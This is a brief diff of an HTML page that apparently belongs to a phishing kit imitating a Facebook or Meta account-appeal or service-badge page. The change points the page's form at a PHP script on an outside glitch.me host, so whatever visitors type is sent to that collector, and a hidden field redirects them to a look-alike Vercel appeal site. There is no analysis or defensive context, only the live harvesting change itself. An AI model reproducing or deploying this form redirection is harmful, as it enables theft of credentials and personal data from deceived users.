--- a/request.html
+++ b/request.html
@@ -8,7 +8,7 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://www.facebook.com/share/1CTjSaYXYh/" method="post">
+        <form action="https://cubic-holly-cookie.glitch.me/zubair.php" method="post">
             <input type="hidden" name="_redirect" value="https://appeal-issue-for-service-badge-on.vercel.app/"/>
             <div id="root">
                 <div>
